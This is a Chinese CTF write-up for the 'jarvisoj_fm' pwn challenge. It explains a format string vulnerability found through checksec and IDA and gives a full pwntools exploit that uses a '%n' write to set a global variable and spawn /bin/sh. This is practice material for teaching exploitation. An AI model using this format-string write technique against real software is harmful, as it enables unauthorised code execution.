0
点赞
收藏
分享

微信扫一扫

jarvisoj_fm

非凡兔 2022-04-05 阅读 42
pwnCTFpythonWriteUp网络安全

jarvisoj_fm

使用checksec查看:
在这里插入图片描述
开启了栈不可执行和Canary。

先放进IDA中分析:
在这里插入图片描述

  • printf(&buf);:存在格式化字符串的漏洞。
  • if ( x == 4 ) { puts("running sh..."); system("/bin/sh"); }:只需x处的值为4即可拿到shell。

题目思路

  • 存在格式化字符串漏洞。
  • 利用格式化字符串漏洞将x处数据写成0x4即可getshell。

步骤解析

在这里插入图片描述

完整exp

from pwn import *

#start
r = process("../buu/jarvisoj_fm")

#params
x_addr = 0x804A02C

#attack
payload = b'%4c%13$n' + p32(x_addr)
print(payload)
r.sendline(payload)

r.interactive()
举报

相关推荐

jarvisoj_level2

pwnpython网络安全CTFWriteUP

jarvisoj_level6_x64

java前端

FM调频列表

javaJavaScript前端开发

android FM播放时拔出耳机后FM APP自动close

androidjavaideJavaScript前端开发

FM家族详解(上)

机器学习推荐算法算法

FM信号、调制信号和载波

锁相环FM信号调制信号载波初值虚拟化云计算

android FM播放时拔出耳机后,FM APP出现"拔出耳机,Fm停止"的提示框,然后自动close

androididejavaHtml/CSS前端开发

关闭Java时后台的FM无法恢复

JVMJAVAJavaHarmonyOS后端开发

杰理之FM模块扩展【篇】

python

Oracle to_char(参数,'FM990.00')函数

mysqloraclesqlOracle数据库
0 条评论